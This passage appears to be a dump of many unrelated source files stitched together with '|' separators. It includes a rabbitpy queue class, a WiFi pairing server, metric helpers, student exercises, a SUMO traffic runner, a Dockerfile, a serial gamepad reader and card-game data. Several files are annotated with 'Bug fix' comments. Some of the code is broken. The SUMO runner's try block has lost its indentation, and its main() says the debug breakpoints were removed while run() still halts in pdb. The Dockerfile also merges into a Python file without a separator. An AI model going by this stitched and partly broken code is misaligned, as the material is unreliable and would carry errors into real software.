                           (exclusive, 'exclusive')]:
            if not isinstance(var, bool):
                raise ValueError('%s must be True or False' % vname)
        for var, vname in [(max_length, 'max_length'),
                           (message_ttl, 'message_ttl'), (expires, 'expires')]:
            if var and not isinstance(var, int):
                raise ValueError('%s must be an int' % vname)
        for var, vname in [(dead_letter_exchange,
                            'dead_letter_exchange'),
                           (dead_letter_routing_key,
                            'dead_letter_routing_key')]:
            if var and not utils.is_string(var):
                raise ValueError('%s must be a str, bytes or unicode' % vname)
        # Bug fix: isinstance expects the dict TYPE, not an instance;
        # `isinstance(arguments, dict())` raised TypeError for any value.
        if arguments and not isinstance(arguments, dict):
            raise ValueError('arguments must be a dict')

        # Defaults
        self.consumer_tag = 'rabbitpy.%i.%s' % (self.channel.id, id(self))
        self.consuming = False

        # Assign Arguments
        self._durable = durable
        self._exclusive = exclusive
        self._auto_delete = auto_delete
        self._arguments = arguments or {}
        self._max_length = max_length
        self._message_ttl = message_ttl
        self._expires = expires
        self._dlx = dead_letter_exchange
        self._dlr = dead_letter_routing_key

    def __len__(self):
        """Return the pending number of messages in the queue by doing a passive
        Queue declare.

        :rtype: int

        """
        response = self._rpc(self._declare(True))
        return response.message_count

    def bind(self, source, routing_key=None, arguments=None):
        """Bind the queue to the specified exchange or routing key.

        :type source: str or :py:class:`rabbitpy.exchange.Exchange` exchange
        :param source: The exchange to bind to
        :param str routing_key: The routing key to use
        :param dict arguments: Optional arguments for RabbitMQ
        :return: bool

        """
        if hasattr(source, 'name'):
            source = source.name
        frame = specification.Queue.Bind(queue=self.name,
                                         exchange=source,
                                         routing_key=routing_key or '',
                                         arguments=arguments)
        response = self._rpc(frame)
        return isinstance(response, specification.Queue.BindOk)

    @contextlib.contextmanager
    def consumer(self, no_ack=False, prefetch=100, priority=None):
        """Consumer message context manager, returns a consumer message
        generator.

        :param bool no_ack: Do not require acknowledgements
        :param int prefetch: Set a prefetch count for the channel
        :param int priority: Consumer priority
        :rtype: :py:class:`Consumer <rabbitpy.queue.Consumer>`

        """
        if prefetch is not None:
            self.channel.prefetch_count(prefetch)
        self.channel._consume(self, no_ack, priority)
        self.consuming = True
        # NOTE(review): Consumer.__exit__ is NOT invoked by this
        # generator-based context manager, so Basic.Cancel is never sent
        # when the `with` block exits -- confirm whether cancellation
        # should be performed here in a finally clause.
        yield Consumer(self)

    def consume_messages(self, no_ack=False, prefetch=100, priority=None):
        """Consume messages from the queue as a generator:

        ```
        for message in queue.consume_messages():
            message.ack()
        ```

        :param bool no_ack: Do not require acknowledgements
        :param int prefetch: Set a prefetch count for the channel
        :param int priority: Consumer priority
        :rtype: :py:class:`Iterator`

        """
        with self.consumer(no_ack, prefetch, priority) as consumer:
            for message in consumer.next_message():
                yield message

    def declare(self, passive=False):
        """Declare the queue on the RabbitMQ channel passed into the
        constructor, returning the current message count for the queue and
        its consumer count as a tuple.

        :param bool passive: Passive declare to retrieve message count and
                             consumer count information
        :return: Message count, Consumer count
        :rtype: tuple(int, int)

        """
        response = self._rpc(self._declare(passive))
        return response.message_count, response.consumer_count

    def delete(self, if_unused=False, if_empty=False):
        """Delete the queue

        :param bool if_unused: Delete only if unused
        :param bool if_empty: Delete only if empty

        """
        self._rpc(specification.Queue.Delete(queue=self.name,
                                             if_unused=if_unused,
                                             if_empty=if_empty))

    def get(self, acknowledge=True):
        """Request a single message from RabbitMQ using the Basic.Get AMQP
        command.

        :param bool acknowledge: Let RabbitMQ know if you will manually
                                 acknowledge or negatively acknowledge the
                                 message after each get.
        :rtype: rabbitpy.message.Message or None

        """
        self._write_frame(specification.Basic.Get(queue=self.name,
                                                  no_ack=not acknowledge))
        return self.channel._get_message()

    def ha_declare(self, nodes=None):
        """Declare the queue as highly available, passing in a list of nodes
        the queue should live on. If no nodes are passed, the queue will be
        declared across all nodes in the cluster.

        :param list nodes: A list of nodes to declare. If left empty, queue
                           will be declared on all cluster nodes.
        :return: Message count, Consumer count
        :rtype: tuple(int, int)

        """
        if nodes:
            self._arguments['x-ha-policy'] = 'nodes'
            self._arguments['x-ha-nodes'] = nodes
        else:
            self._arguments['x-ha-policy'] = 'all'
            if 'x-ha-nodes' in self._arguments:
                del self._arguments['x-ha-nodes']
        return self.declare()

    def purge(self):
        """Purge the queue of all of its messages.

        Bug fix: the original sent Queue.Purge() without the queue name,
        unlike delete()/declare() which always pass queue=self.name.
        """
        self._rpc(specification.Queue.Purge(queue=self.name))

    def unbind(self, source, routing_key=None):
        """Unbind queue from the specified exchange where it is bound the
        routing key. If routing key is None, use the queue name.

        :type source: str or :py:class:`rabbitpy.exchange.Exchange` exchange
        :param source: The exchange to unbind from
        :param str routing_key: The routing key that binds them

        """
        if hasattr(source, 'name'):
            source = source.name
        # Bug fix: the original issued Queue.Bind here, re-binding the
        # queue instead of removing the binding.
        self._rpc(specification.Queue.Unbind(queue=self.name,
                                             exchange=source,
                                             routing_key=routing_key or
                                                         self.name))

    def _declare(self, passive=False):
        """Return a specification.Queue.Declare class pre-composed for the rpc
        method since this can be called multiple times.

        :param bool passive: Passive declare to retrieve message count and
                             consumer count information
        :rtype: pamqp.specification.Queue.Declare

        """
        # Fold the optional policy settings into the x-* queue arguments.
        arguments = dict(self._arguments)
        if self._expires:
            arguments['x-expires'] = self._expires
        if self._message_ttl:
            arguments['x-message-ttl'] = self._message_ttl
        if self._max_length:
            arguments['x-max-length'] = self._max_length
        if self._dlx:
            arguments['x-dead-letter-exchange'] = self._dlx
        if self._dlr:
            arguments['x-dead-letter-routing-key'] = self._dlr
        return specification.Queue.Declare(queue=self.name,
                                           durable=self._durable,
                                           passive=passive,
                                           exclusive=self._exclusive,
                                           auto_delete=self._auto_delete,
                                           arguments=arguments)
class Consumer(object):
    """The Consumer class implements an iterator that will retrieve the next
    message from the stack of messages RabbitMQ has delivered until the client
    exits the iterator. It should be used with the
    :py:meth:`Queue.consumer() <rabbitpy.queue.Queue.consumer>` method which
    returns a context manager for consuming.

    """
    def __init__(self, queue):
        # The Queue instance messages are consumed from.
        self.queue = queue

    def __exit__(self, exc_type, exc_val, exc_tb):
        """Called when exiting the consumer iterator: cancel the consumer
        on the broker and mark the queue as no longer consuming.

        """
        self.queue.channel.rpc(self._basic_cancel)
        self.queue.consuming = False

    @property
    def _basic_cancel(self):
        # Pre-built Basic.Cancel frame for this consumer's tag.
        return specification.Basic.Cancel(consumer_tag=self.queue.consumer_tag)

    def next_message(self):
        """Retrieve the next message from the queue as an iterator, blocking
        until the next message is available.

        :rtype: :py:class:`rabbitpy.message.Message`

        """
        while self.queue.consuming:
            yield self.queue.channel._consume_message()
|
# Print a triangle of products: row i lists i*1 .. i*i, rows separated by
# a blank line.
limit = int(input("Enter a limit:"))
for row in range(1, limit + 1):
    for col in range(0, row + 1):
        product = row * col
        if product == 0:
            continue
        print(product, end=" ")
    print("\n")
|
# KVM-based Discoverable Cloudlet (KD-Cloudlet)
# Copyright (c) 2015 Carnegie Mellon University.
# All Rights Reserved.
#
# THIS SOFTWARE IS PROVIDED "AS IS," WITH NO WARRANTIES WHATSOEVER. CARNEGIE MELLON UNIVERSITY EXPRESSLY DISCLAIMS TO THE FULLEST EXTENT PERMITTEDBY LAW ALL EXPRESS, IMPLIED, AND STATUTORY WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT OF PROPRIETARY RIGHTS.
#
# Released under a modified BSD license, please see license.txt for full terms.
# DM-0002138
#
# KD-Cloudlet includes and/or makes use of the following Third-Party Software subject to their own licenses:
# MiniMongo
# Copyright (c) 2010-2014, Steve Lacy
# All rights reserved. Released under BSD license.
# https://github.com/MiniMongo/minimongo/blob/master/LICENSE
#
# Bootstrap
# Copyright (c) 2011-2015 Twitter, Inc.
# Released under the MIT License
# https://github.com/twbs/bootstrap/blob/master/LICENSE
#
# jQuery JavaScript Library v1.11.0
# http://jquery.com/
# Includes Sizzle.js
# http://sizzlejs.com/
# Copyright 2005, 2014 jQuery Foundation, Inc. and other contributors
# Released under the MIT license
# http://jquery.org/license
import socket
import os
from wifi_ska_comm import WiFiSKACommunicator, WiFiAdapter, TestAdapter
######################################################################################################################
#
######################################################################################################################
class WiFiSKAServer(object):
    ####################################################################################################################
    # Single-connection server for SKA pairing commands over WiFi (Python 2).
    ####################################################################################################################
    def __init__(self, host, port, secret, files_path, pairing_handler, adapter=WiFiAdapter(), fqdn=None):
        # NOTE(review): the WiFiAdapter() default is evaluated once at
        # definition time and shared by every instance that omits the
        # argument -- confirm the adapter is stateless enough for that.
        self.device_socket = None       # listening socket, created in wait_for_messages()
        self.host = host                # address to bind to
        self.port = port                # port to listen on
        self.secret = secret            # shared secret handed to the communicator
        self.files_path = files_path    # base folder for received files
        self.handler = pairing_handler  # provides get_storage_folder_path()/handle_incoming()
        self.adapter = adapter
        self.fqdn = fqdn                # local FQDN passed to the communicator

    ####################################################################################################################
    # Listen on a socket and handle commands. Each connection spawns a separate thread
    ####################################################################################################################
    def wait_for_messages(self):
        # Fail early if there is no usable WiFi adapter.
        adapter_name = self.adapter.get_adapter_name()
        if adapter_name is None:
            raise Exception("WiFi adapter not available.")

        self.device_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print(self.host + '-' + str(self.port))
        self.device_socket.bind((self.host, self.port))
        self.device_socket.listen(1)

        # Wait for a connection. Only ONE connection is served per call:
        # the finally block closes the listener right after accept().
        try:
            print('Waiting for a connection')
            data_socket, addr = self.device_socket.accept()
            comm = WiFiSKACommunicator(data_socket, self.secret, local_fqdn=self.fqdn)
            print('Device connected')
        except Exception as e:
            print('Error waiting for connections: ' + str(e))
            return
        except KeyboardInterrupt:
            print('Stopped with Ctrl+C from user... socket will be closed')
            raise
        finally:
            self.device_socket.close()
            print('Listener socket closed.')

        # Get new data until we get a final command.
        try:
            while True:
                print('Waiting for a message')
                command, message = comm.receive_command()
                print "Received a message."
                # If the command needs to get a file, first store it in a temp location before handling the command.
                if command == "receive_file":
                    folder_path = self.handler.get_storage_folder_path(self.files_path, message)
                    if not os.path.exists(folder_path):
                        os.makedirs(folder_path)
                    comm.receive_file(message, folder_path)
                # Handle the command.
                return_code, return_data = self.handler.handle_incoming(command, message, self.files_path)
                if return_code == 'send':
                    comm.send_data(return_data)
                elif return_code == 'ok':
                    comm.send_success_reply()
                elif return_code == 'transfer_complete':
                    # Final command: acknowledge and stop serving.
                    comm.send_success_reply()
                    break
                else:
                    comm.send_error_reply('Could not properly handle command.')
        except Exception as e:
            # NOTE(review): e.message is Python 2 only (this file also uses
            # print statements); under Python 3 this line would fail.
            comm.send_error_reply(e.message)
######################################################################################################################
# Test handler
######################################################################################################################
class TestHandler(object):
    ####################################################################################################################
    # Create path and folders to store the files.
    ####################################################################################################################
    def get_storage_folder_path(self, base_path, message):
        return os.path.join(base_path, message['cloudlet_name'])

    ####################################################################################################################
    # Handle an incoming message. Always returns a (return_code,
    # return_data) pair, as expected by WiFiSKAServer.wait_for_messages().
    ####################################################################################################################
    def handle_incoming(self, command, message, files_path):
        # print(...) calls (valid in Python 2 and 3, same output) replace
        # the original bare print statements.
        print('Handling command: ' + command)
        if command == 'send_data':
            return 'send', ('device_id', 'pepe')
        elif command == 'transfer_complete':
            return command, ''
        elif command == 'receive_data':
            print('Command: ' + message['command'])
            return 'ok', ''
        elif command == "receive_file":
            print('File: ' + message['file_id'])
            full_path = os.path.join(self.get_storage_folder_path(files_path, message), message['file_id'])
            print('File contents: ')
            with open(full_path, 'r') as test_file:
                print(test_file.read())
            return 'ok', ''
        else:
            # Bug fix: the original returned the single value 'error' here,
            # which broke the caller's two-value unpacking with ValueError.
            return 'error', ''
######################################################################################################################
# Test method
######################################################################################################################
def test():
    """Smoke test: run a loopback server with the dummy handler/adapter."""
    handler = TestHandler()
    adapter = TestAdapter('eth0')
    server = WiFiSKAServer(host='127.0.0.1', port=1700, secret='secret',
                           files_path='./data/test',
                           pairing_handler=handler, adapter=adapter)
    server.wait_for_messages()
|
#
# Copyright The NOMAD Authors.
#
# This file is part of NOMAD. See https://nomad-lab.eu for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nomad.metainfo import Section, Quantity, Package
from nomad.datamodel.metainfo.public import section_single_configuration_calculation as SCC
# Metainfo package that collects the OpenMX-specific definitions in this module.
m_package = Package(
    name='openmx_nomadmetainfo_json',
    description='None')
# We extend the existing common definition of a section "single configuration calculation"
class OpenmxSCC(SCC):
    """OpenMX extension of the common single-configuration-calculation section."""
    # We alter the default base class behavior to add all definitions to the existing
    # base class instead of inheriting from the base class
    m_def = Section(extends_base_section=True)
    # We define an additional example quantity. Use the prefix x_<parsername>_ to denote
    # non common quantities.
    x_example_magic_value = Quantity(type=int, description='The magic value from a magic source.')
# Finalize the metainfo definitions declared in this module.
m_package.__init_metainfo__()
|
import numpy as np
import pandas as pd
from sklearn.metrics import f1_score
from sklearn.metrics import accuracy_score
from ..preprocessing import data_splitting as ds, labels
def calc_f1_and_acc_for_column(true, predicted):
    """Return (f1, accuracy) for a single label column."""
    return f1_score(true, predicted), accuracy_score(true, predicted)
def calc_task_wise_f1s(true, predicted, name):
    """Per-task F1 scores as a one-row DataFrame indexed '<name>_f1s'."""
    tasks = true.columns
    row = name + '_f1s'
    results = pd.DataFrame(np.zeros([1, len(tasks)]), index=[row], columns=tasks)
    for task in tasks:
        results.loc[row, task] = f1_score(true.loc[:, task], predicted.loc[:, task])
    return results
def calc_task_wise_acc(true, predicted, name):
    """Per-task accuracy as a one-row DataFrame indexed '<name>_acc'."""
    tasks = true.columns
    row = name + '_acc'
    results = pd.DataFrame(np.zeros([1, len(tasks)]), index=[row], columns=tasks)
    for task in tasks:
        results.loc[row, task] = accuracy_score(true.loc[:, task], predicted.loc[:, task])
    return results
def calc_micro_mean_f1_acc(true, predicted):
    """Micro-averaged (f1, accuracy): flatten all task columns into one long
    vector and score it as a single binary problem."""
    n_items, n_tasks = true.shape
    flat_shape = [n_items * n_tasks, 1]
    y_flat = np.reshape(true.values, flat_shape)
    p_flat = np.reshape(predicted.values, flat_shape)
    return f1_score(y_flat, p_flat), accuracy_score(y_flat, p_flat)
def calc_macro_mean_f1_pp(true, predicted):
    """Item-wise macro metrics: (mean per-item F1, fraction of items whose
    entire label row is predicted perfectly)."""
    n_items, _ = true.shape
    per_item_f1 = pd.DataFrame(np.zeros([n_items, 1]), index=true.index)
    n_perfect = 0
    for rid in true.index:
        per_item_f1.loc[rid] = f1_score(true.loc[rid], predicted.loc[rid])
        # A "perfect" item has zero absolute disagreement across all tasks.
        if np.sum(np.abs(true.loc[rid] - predicted.loc[rid])) == 0:
            n_perfect += 1
    percent_perfect = n_perfect / float(n_items)
    return np.mean(per_item_f1.values), percent_perfect
def get_report_header(dataset, test_fold, dev_subfold):
    """Two-row DataFrame with per-task positive-label counts for the train
    ('nTrain') and dev ('nTest') splits of *dataset*."""
    multi_y = labels.get_dataset_labels(dataset)
    header = pd.DataFrame(np.zeros([2, multi_y.shape[1]]),
                          index=['nTrain', 'nTest'], columns=multi_y.columns)
    train_docs = ds.get_train_documents(dataset, test_fold, dev_subfold)
    dev_docs = ds.get_dev_documents(dataset, test_fold, dev_subfold)
    header.loc['nTrain'] = multi_y.loc[train_docs].sum(axis=0)
    header.loc['nTest'] = multi_y.loc[dev_docs].sum(axis=0)
    return header
def get_summary_report_header(datasets, test_fold, dev_subfold):
    """Summary header: fold identifiers plus train/dev sizes per dataset."""
    rows = ['testFold', 'devSubFold', 'nTrain', 'nTest']
    header = pd.DataFrame(np.zeros([len(rows), len(datasets)]),
                          index=rows, columns=datasets)
    header.loc['testFold', :] = test_fold
    header.loc['devSubFold', :] = dev_subfold
    for dataset in datasets:
        header.loc['nTrain', dataset] = len(
            ds.get_train_documents(dataset, test_fold, dev_subfold))
        header.loc['nTest', dataset] = len(
            ds.get_dev_documents(dataset, test_fold, dev_subfold))
    return header
|
# Simple dictionary lookup: each line of the file is "key:value"; print the
# value(s) whose key matches the user's input.
with open(r"C:\Users\admin\OneDrive\デスクトップ\python1\07\20k1026-06-dictionary.txt",encoding="utf8") as file:
    # Bug fix: the lookup key was stored in a variable named `dict`,
    # shadowing the builtin; renamed to `key`.
    key = input("キーを入力してください:")
    for line in file:
        data = line.split(":")  # -> ["key", "value\n"]
        if data[0] == key:
            print(f"{data[1]}")
#
'--------------------------------------------'
|
import socket
# Simple remote-command client: send a command line, receive a size-prefixed
# reply ("CMD_RESULT_SIZE|<nbytes>" header, then the body in 512-byte chunks).
client = socket.socket()
ip = '192.168.0.155'
port = 22564
client.connect((ip, port))
while True:
    date = input('cmd:').strip()
    if not date:
        continue
    elif date == 'q':
        # 'q' quits the client loop.
        break
    else:
        client.sendall(date.encode('utf-8'))
        output = ''
        # First reply is the size header.
        cmd_ack_result = client.recv(512)
        cmd_rev_msg = cmd_ack_result.decode('utf-8').split("|")
        # Acknowledge the header so the server starts streaming the body.
        client.sendall('OK'.encode('utf-8'))
        print(cmd_rev_msg)
        if cmd_rev_msg[0] == "CMD_RESULT_SIZE":
            cmd_msg_len = int(cmd_rev_msg[1])
            if cmd_msg_len == 0:
                continue
            while True:
                response = client.recv(512).decode('utf-8')
                output += response
                cmd_msg_len -= len(response)
                print(cmd_msg_len)
                # Bug fix: use <= 0 instead of == 0 so a server/client byte
                # count mismatch (e.g. multi-byte characters counted as bytes
                # but subtracted as decoded characters) cannot loop forever.
                if cmd_msg_len <= 0:
                    print(output)
                    print('----------recv_done----------')
                    break
client.close()
|
# File: hw4_part3.py
# Author: Joel Okpara
# Date: 2/28/2016
# Section: 04
# E-mail: joelo1@umbc.edu
# Description: Figures out how much money user made for charity
# based on the amount of pledges and plunges
def main():
    """Ask for each pledge's donation value and report the money raised.

    Total raised = (sum of all donation values) * number of plunges.
    """
    pledges = int(input("How many pledges did you get? "))
    totalValue = 0.0
    for n in range(1, pledges + 1):
        value = float(input("What was the value of donation "+ str(n)+": "))
        # Bug fix: accumulate every donation.  The original did
        # `totalValue = value + value`, which overwrote the total with
        # twice the most recent donation.
        totalValue += value
    plunge = int(input("How many plunges did you do? "))
    earned = totalValue * plunge
    print("Based on your",plunge,"plunges, you earned:","$"+str(earned),"for charity")
# Run the interactive program when the file is executed.
main()
|
"""
You've finished eating at a restaurant, and received this bill:
Cost of meal: $44.50
Restaurant tax: 6.75%
Tip: 15%
"""
# Bill parameters.
meal = 44.50
tax = 0.0675
tip = 0.15
# Tax applies to the meal price; the tip is then computed on the taxed
# amount (meal is deliberately rebound to the taxed price).
meal = meal * (1 + tax)
total = meal * (1 + tip)
print("%.2f" % total)
|
class Add:
    """Pipeline stage that adds a constant to data["input"]."""
    requires = ["input"]
    provides = ["output"]
    def __init__(self, val):
        # Constant offset applied by process().
        self.val = val
    def process(self, data):
        # Store the shifted value under the key declared in `provides`.
        shifted = data["input"] + self.val
        data["output"] = shifted
class Mult:
    """Pipeline stage that multiplies data["input"] by a constant."""
    requires = ["input"]
    provides = ["output"]
    def __init__(self, val):
        # Constant factor applied by process().
        self.val = val
    def process(self, data):
        # Store the scaled value under the key declared in `provides`.
        scaled = data["input"] * self.val
        data["output"] = scaled
class Result:
    """Terminal pipeline stage: verifies an upstream stage produced "output"."""
    requires = ["output"]
    provides = []
    def process(self, data):
        # Fails loudly if the pipeline wiring never set "output".
        assert "output" in data
class RequiresNonsense:
    """Test stage whose requirement ("nonsense") no other stage provides."""
    requires = ["nonsense"]
    provides = ["nothing"]
    def process(self, data):
        pass
class DummyModule:
    """No-op stage: consumes "input" and provides nothing."""
    requires = ["input"]
    provides = []
    def process(self, data):
        pass
|
#!/usr/bin/env python
"""
@file runner1_try.py
@author yao
SUMO, Simulation of Urban MObility; see http://sumo.dlr.de/
Copyright (C) 2009-2017 DLR/TS, Germany
latest version
"""
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
import optparse
import random
import Globalvar
import tl_c as tlc
# import numpy as np
import generate_routefile as gen_route
# from collections import OrderedDict
try:
sys.path.append(os.path.join(os.path.dirname(
__file__), '..', '..', '..', '..', "tools")) # tutorial in tests
sys.path.append(os.path.join(os.environ.get("SUMO_HOME", os.path.join(
os.path.dirname(__file__), "..", "..", "..")), "tools")) # tutorial in docs
from sumolib import checkBinary # noqa
except ImportError:
sys.exit(
"please declare environment variable 'SUMO_HOME' as the root directory of your sumo installation (it should"
" contain folders 'bin', 'tools' and 'docs')")
# import tl_c as tlc
# we need to import python modules from the $SUMO_HOME/tools directory
import traci
import pdb
import result
# ====================================================================================================
# control main
# ====================================================================================================
def run():
    """Execute the TraCI control loop.

    Steps the simulation until no more vehicles are expected, tracking which
    departed vehicles are CAVs (vehicle type 'auto') and optionally running
    ALINEA ramp metering via tlc.TrafficLight.

    Returns:
        (av_list, simstep): every CAV id that ever departed, and the number
        of simulation steps executed.
    """
    # initialize indices
    simstep = 0
    # optnr = Globalvar.optnr
    # tldcum = OrderedDict() # time point of passing tlc decision point
    ldcar = list() # tuple of CAV
    av_list = list()
    occupancy = 0
    # phasetime = 0 # initial phase time
    # platoon_size = dict() # dict of: {leader_id: platoon_tailed_id}
    # tl_lastswitch = dict()
    # we start with phase 2 where EW has green
    while traci.simulation.getMinExpectedNumber() > 0:
        traci.simulationStep()
        # NOTE(review): leftover conditional debug breakpoint — this halts
        # any run that reaches step 1400; remove before unattended runs.
        if simstep >= 1400: pdb.set_trace()
        # create ldcar:list of running auto cars
        # NOTE(review): only the first id from getDepartedIDList() is
        # inspected each step — confirm at most one vehicle departs per step.
        try:
            depart_id = traci.simulation.getDepartedIDList()[0]
        except IndexError:
            pass
        else:
            if traci.vehicle.getTypeID(depart_id) == 'auto':
                ldcar.extend([depart_id])
                av_list.extend([depart_id])
        # Drop vehicles that have arrived from the running-CAV list.
        arrived_list = list(traci.simulation.getArrivedIDList())
        if arrived_list:
            ldcar_set = set(ldcar) - set(arrived_list)
            ldcar = list(ldcar_set)
        if Globalvar.ramp_metering == 1:
            # alinea
            tl_id = '2'
            tl_control = tlc.TrafficLight(tl_id, simstep)
            # pdb.set_trace()
            occupancy = tl_control.alinea(occupancy)
        simstep += 1
        print(simstep)
    # print(plplan)
    traci.close()
    sys.stdout.flush()
    # return dist, v, leadingmatrix, ldcar, carcum, testav, merge_cum, split_cum
    return av_list, simstep
def get_options():
    """Parse command-line options; --nogui requests the non-GUI sumo binary."""
    parser = optparse.OptionParser()
    parser.add_option("--nogui", action="store_true",
                      default=False, help="run the commandline version of sumo")
    opts, _ = parser.parse_args()
    return opts
def main():
    """Entry point: generate the route file, launch SUMO via TraCI, run the
    control loop, and write the result files.

    NOTE: removed two leftover pdb.set_trace() debug breakpoints so the
    script can run unattended.
    """
    # Fixed seed so vehicle generation is reproducible between runs.
    random.seed(666)
    sumoBinary = checkBinary('sumo-gui')  # skip the choosing part
    # Simulation step length in seconds.
    time_step = 0.1
    # set global variables and input data
    # first, generate the route file for this simulation
    gen_route.generate_routefile()
    # vehNr = Globalvar.nrtotal
    traci.start([sumoBinary, "-c", "data/cross1.sumocfg", "--step-length", str(time_step),
                 "--tripinfo-output", "tripinfo.xml", "--time-to-teleport", "1000"])
    # Run the TraCI control loop (blocks until the simulation ends).
    av_list, simstep = run()
    # Convert the step count back to simulated seconds for the result writer.
    rt = result.Result(av_list, int(simstep*time_step))
    rt.result_file()
if __name__ == '__main__':
    main()
|
# Base image with Python + conda preinstalled.
FROM continuumio/anaconda3:4.8.3
# Copy the whole project into the image.
COPY . /usr/app/
# Streamlit's default port.
EXPOSE 8501
WORKDIR /usr/app/
# Install Python dependencies.
RUN pip install -r requirements.txt
# Launch the Streamlit app (shell form).
CMD streamlit run pratice.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import serial
# Serial link to the controller adapter (Raspberry Pi UART), 57600 baud,
# 3 s read timeout.
port = serial.Serial("/dev/ttyAMA0", baudrate=57600, timeout=3.0)
def readlineCR(port):
    """Read from *port* one character at a time until a carriage return or an
    empty read (timeout); return everything read, terminator included."""
    buffered = ""
    while True:
        ch = port.read()
        buffered += ch
        if ch in ('\r', ''):
            return buffered
# Parallel tables mapping the 2-letter wire code in each ";<pad><code>:\r"
# message to the button name used in the returned state dictionary.
_BUTTON_NAMES = ["CUADRADO", "TRIANGULO", "CIRCULO", "EQUIS",
                 "ARRIBA", "ABAJO", "IZQUIERDA", "DERECHA",
                 "L1", "R1", "L2", "R2", "L3", "R3",
                 "START", "SELECT",
                 "JLARRIBA", "JLABAJO", "JLIZQUIERDA", "JLDERECHA",
                 "JRARRIBA", "JRABAJO", "JRIZQUIERDA", "JRDERECHA"]
_BUTTON_CODES = ["CU", "TR", "CI", "EQ",
                 "AR", "AB", "IZ", "DE",
                 "L1", "R1", "L2", "R2", "L3", "R3",
                 "ST", "SE",
                 "LU", "LD", "LL", "LR",
                 "RU", "RD", "RL", "RR"]
# Full message -> state key, e.g. ";1CU:\r" -> "PS1_CUADRADO", for both pads.
_MSG_TO_KEY = {}
for _pad in (1, 2):
    for _code, _name in zip(_BUTTON_CODES, _BUTTON_NAMES):
        _MSG_TO_KEY[";%d%s:\r" % (_pad, _code)] = "PS%d_%s" % (_pad, _name)
def keysPS():
    """Poll the serial port for controller events.

    Returns a dict mapping every PS1_*/PS2_* button name to True when a
    press message for it arrived since the last call, False otherwise.
    Replaces the original 96-branch if/elif chain with a table lookup;
    unrecognised messages are ignored, exactly as before.
    """
    salida = dict((key, False) for key in _MSG_TO_KEY.values())
    # Drain everything currently buffered on the port.
    while port.inWaiting() > 0:
        rcv = readlineCR(port)
        key = _MSG_TO_KEY.get(rcv)
        if key is not None:
            salida[key] = True
    # Ask both pads to report their state again.
    port.write(";1RE:")
    port.write(";2RE:")
    return salida
# -*- coding: utf-8 -*-
_ROOM_INIT_DATA={
"hs_hero":[
{
"uid": None, "heroId": 1, "buff":{}, "crystal":1, "name":"PA", "heroClass":"warrior", "element":"air", "atk": 0, "hp": 30, "skillId": 0, "flavorText":"The time is now!"
},
{
"uid": None, "heroId": 2, "buff":{}, "crystal":1, "name":"SK", "heroClass":"warrior", "element":"air", "atk": 0, "hp": 30, "skillId": 0, "flavorText":"The calm, before the storm."
},
]
,
"hs_card": [
{"id": 1, "name":"card1", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "0", "hp": 1, "durability": 0, "skillId": 0, "flavor_text":""},
{"id": 2, "name":"card2", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "1", "hp": 2, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 3, "name":"card3", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "2", "hp": 3, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 4, "name":"card4", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "3", "hp": 4, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 5, "name":"card5", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "4", "hp": 5, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 6, "name":"card6", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "5", "hp": 1, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 7, "name":"card7", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "6", "hp": 2, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 8, "name":"card8", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "7", "hp": 3, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 9, "name":"card9", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "0", "hp": 4, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 10, "name":"card10", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "1", "hp": 5, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 11, "name":"card11", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "2", "hp": 1, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 12, "name":"card12", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "3", "hp": 2, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 13, "name":"card13", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "4", "hp": 3, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 14, "name":"card14", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "5", "hp": 4, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 15, "name":"card15", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "6", "hp": 5, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 16, "name":"card16", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "7", "hp": 1, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 17, "name":"card17", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "0", "hp": 2, "durability": 0, "skillId": 0, "flavorText":""},
